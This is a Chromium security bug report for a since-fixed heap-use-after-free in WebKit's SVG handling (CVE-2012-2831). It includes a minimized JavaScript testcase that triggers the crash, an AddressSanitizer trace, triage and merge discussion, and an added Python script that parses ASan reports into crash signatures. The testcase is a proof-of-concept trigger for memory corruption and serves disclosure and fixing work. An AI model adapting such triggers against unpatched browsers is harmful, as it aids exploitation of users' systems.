
Issue metadata

Status: Fixed
Closed: Dec 2012
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Issue 130356: Heap-use-after-free in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget

Reported by, May 30 2012

Issue description

use-after-free in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget

Chrome Version: dev

Chromium	21.0.1157.0 (Developer Build 139531)
OS	Linux
WebKit	537.1 (@118843)

Operating System: 64bit precise

      // Minimized testcase from the report; the crash is only observable in an ASan build.
      onload = function() {
        el0 = document.createElementNS('', 'svg');
        el1 = document.createElementNS('', 'svg');
        el2 = document.createElementNS('', 'image');
        el3 = document.createElementNS('', 'textPath');
        el3.setAttributeNS('', 'xlink:href', '#el1');
        el4 = document.createElementNS('', 'use');
        el4.setAttributeNS('', 'xlink:href', '#el2');
        el2.setAttributeNS('', 'xlink:href', '#el0');
        window.getSelection().setBaseAndExtent(el1, 0, el1, 0);
        setTimeout("location.reload()", 10);
      };

Type of crash: tab + asan
Crash State: 

==9219== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffed156480 at pc 0x55555bb9c7b9 bp 0x7fffffff6230 sp 0x7fffffff6228
READ of size 8 at 0x7fffed156480 thread T0
    #0 0x55555bb9c7b9 in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget(WebCore::SVGElement*) ???:0
    #1 0x55555bba923e in WebCore::SVGElement::removedFrom(WebCore::ContainerNode*) ???:0
    #2 0x55555bd42d90 in WebCore::SVGStyledElement::removedFrom(WebCore::ContainerNode*) ???:0

0x7fffed156480 is located 0 bytes inside of 392-byte region [0x7fffed156480,0x7fffed156608)
freed by thread T0 here:
    #0 0x55555e5cbd52 in operator delete(void*) ??:0
    #1 0x55555bbb3728 in WebCore::SVGElementInstance::detach() ???:0
    #2 0x55555bbb3246 in WebCore::SVGElementInstance::~SVGElementInstance() ???:0
    #3 0x55555bbb319e in WebCore::SVGElementInstance::~SVGElementInstance() ???:0
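
The ASan report above is the raw form of the triage summary ClusterFuzz posts in comment 2 (Crash Type: Heap-use-after-free READ 8, the crash address, then the crash and free stacks). As an added example that is not part of the original report, this Python parser derives that summary from the report text; the ASAN_REPORT sample is a constructed copy of the frames shown above, and the allocator-frame skip list is an assumption about how such states are keyed, not ClusterFuzz's actual rules.

```python
import re
# Constructed sample: the ASan report from the issue description, trimmed to
# the frames shown there (a real report carries the full stacks).
ASAN_REPORT = """\
==9219== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffed156480 at pc 0x55555bb9c7b9 bp 0x7fffffff6230 sp 0x7fffffff6228
READ of size 8 at 0x7fffed156480 thread T0
    #0 0x55555bb9c7b9 in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget(WebCore::SVGElement*) ???:0
    #1 0x55555bba923e in WebCore::SVGElement::removedFrom(WebCore::ContainerNode*) ???:0
    #2 0x55555bd42d90 in WebCore::SVGStyledElement::removedFrom(WebCore::ContainerNode*) ???:0

0x7fffed156480 is located 0 bytes inside of 392-byte region [0x7fffed156480,0x7fffed156608)
freed by thread T0 here:
    #0 0x55555e5cbd52 in operator delete(void*) ??:0
    #1 0x55555bbb3728 in WebCore::SVGElementInstance::detach() ???:0
    #2 0x55555bbb3246 in WebCore::SVGElementInstance::~SVGElementInstance() ???:0
    #3 0x55555bbb319e in WebCore::SVGElementInstance::~SVGElementInstance() ???:0
"""

HEADER_RE = re.compile(r"ERROR: AddressSanitizer:? (?P<type>[\w-]+) on address (?P<addr>0x[0-9a-f]+)")
ACCESS_RE = re.compile(r"^(?P<op>READ|WRITE) of size (?P<size>\d+)", re.M)
FRAME_RE = re.compile(r"^\s*#\d+ 0x[0-9a-f]+ in (?P<func>.+?) \S+$")
ALLOCATOR_FRAMES = ("operator delete", "operator new", "free", "malloc")  # assumed skip list

def parse_asan_report(text):
    """Return crash type, access kind/size, address and the crash/free stacks."""
    header, access = HEADER_RE.search(text), ACCESS_RE.search(text)
    if not header or not access:
        raise ValueError("not an ASan memory-access report")
    stacks, section = {"crash": [], "free": []}, "crash"
    for line in text.splitlines():
        if line.startswith("freed by"):               # frames below: free stack
            section = "free"
        elif line.startswith("previously allocated by"):
            break                                     # allocation stack not used
        m = FRAME_RE.match(line)
        if m:                                         # "Foo::bar(int*)" -> "Foo::bar"
            stacks[section].append(m.group("func").split("(", 1)[0])
    kind = header.group("type")
    return {"crash_type": kind[0].upper() + kind[1:], "access": access.group("op"),
            "size": int(access.group("size")), "address": header.group("addr"), **stacks}

def crash_state(report, depth=3):
    """ClusterFuzz-style signature: top frames per stack, allocator frames skipped."""
    def top(frames):
        return [f for f in frames if f not in ALLOCATOR_FRAMES][:depth]
    return {"crash": top(report["crash"]), "free": top(report["free"])}

if __name__ == "__main__":
    print(crash_state(parse_asan_report(ASAN_REPORT)))
```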

Comment 1 by, May 30 2012

Labels: WebKit-SVG

Comment 2 by, May 30 2012

Summary: Heap-use-after-free in WebCore::SVGDocumentExtensions::removeAllElementReferencesForTarget
Detailed report:


Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7f9edf9b3c80
Crash State:
  - crash stack -
  - free stack -

Minimized Testcase (1.10 Kb):

Comment 3 by, May 30 2012

Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit OS-All Mstone-21 SecImpacts-None Stability-AddressSanitizer SecSeverity-High
SVG team, please help to find the regresse

Comment 4 by, Jun 1 2012

looks like the most probable regresse

Comment 5 by, Jun 1 2012

Labels: ReleaseBlock-Stable
Status: Available
Thanks Philip. Can you please help to upstream this and poke Rob to fix the regression :)

Comment 6 by, Jun 1 2012

Labels: WebKit-ID-88144

Comment 7 by, Jun 5 2012

According to, which is the bug pdr believes is the root cause, the bug should be fixed. We now have that fix in our tree; I can't reproduce the crash on Mac dev or canary, but that doesn't necessarily mean it's really fixed. ClusterFuzz hasn't told us that we are happy yet, so maybe the bug persists?

I hate to be presumptuous, but I also hate to have a release-blocker with no owner, so I'm giving this to pdr. Maybe it'll turn out that you don't need to do anything. And if you're not the right person to take it, can you let us know who is best? Thanks! And, sorry. :)

Comment 8 by, Jun 5 2012

This bug is still present, you need to use an ASAN build to hit it though. Re-pinging rbuis to get this fixed, or I'll pick it up myself if he doesn't respond.

Comment 9 by, Jun 6 2012

I'm now on this bug.

Comment 10 by, Jun 12 2012

Small update: I haven't forgotten about this (it's my top issue).

Comment 11 by, Jun 14 2012

Patch up!

Comment 12 by, Jun 14 2012

@Abhishek, to get this in it needs to be in before tomorrow. Can you review this? Pinging Rob on IRC is not working and Niko is offline.

Comment 13 by, Jun 18 2012

Labels: Merge-Approved
Status: FixUnreleased

Philip, does this need merging for m20? That function looked old, it might be that some new code just helped to trigger this.

Comment 14 by, Jun 18 2012

I think this does need merging. introduced the textPath regression, but is the real culprit which introduced this new resource handling model. There is almost certainly the same security bug in feImageElement.

Comment 15 by, Jun 18 2012

Labels: -Mstone-21 -SecImpacts-None Mstone-20 SecImpacts-Stable SecImpacts-Beta

Comment 16 by, Jun 19 2012

Labels: -Restrict-View-SecurityTeam -Merge-Approved Restrict-View-SecurityNotify Merge-Merged

Comment 17 by, Jun 19 2012

Labels: reward-topanel

Comment 18 by, Jun 19 2012

Just FYI: This bug also exposed some content model issues in SVG that schenney and I are working on in free time. For instance, you shouldn't be able to have:
to begin with.

Comment 20 by, Jun 22 2012

Labels: -reward-topanel reward-1000 reward-unpaid

Comment 21 by, Jun 25 2012

Labels: CVE-2012-2831

Comment 22 by, Jul 9 2012

Labels: -reward-unpaid

Comment 23 by, Oct 13 2012

Project Member
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.

Comment 24 by, Dec 20 2012

Status: Fixed

Comment 25 by, Jan 18 2013

Labels: Restrict-View-EditIssue

Comment 26 by, Mar 10 2013

Project Member
Labels: -Type-Security -Area-WebKit -WebKit-SVG -Mstone-20 -SecImpacts-Stable -Stability-AddressSanitizer -SecSeverity-High -SecImpacts-Beta Cr-Content M-20 Security-Impact-Stable Security-Impact-Beta Cr-Content-SVG Performance-Memory-AddressSanitizer Type-Bug-Security Security-Severity-High

Comment 27 by, Mar 14 2013

Project Member
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue

Comment 28 by, Mar 21 2013

Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue

Comment 29 by, Mar 21 2013

Project Member
Labels: -Security-Severity-High Security_Severity-High

Comment 30 by, Mar 21 2013

Project Member
Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 31 by, Mar 21 2013

Project Member
Labels: -Security-Impact-Beta Security_Impact-Beta

Comment 32 by, Apr 1 2013

Project Member
Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer

Comment 33 by, Apr 6 2013

Project Member
Labels: -Cr-Content Cr-Blink

Comment 34 by, Apr 6 2013

Project Member
Labels: -Cr-Content-SVG Cr-Blink-SVG

Comment 35 by, Jun 14 2016

Project Member
Labels: -security_impact-beta

Comment 36 by, Oct 1 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit - Your friendly Sheriffbot

Comment 37 by, Oct 2 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit - Your friendly Sheriffbot

Comment 38 by, Oct 2 2016

Labels: allpublic

Comment 39 by, Apr 25 2018

Labels: CVE_description-submitted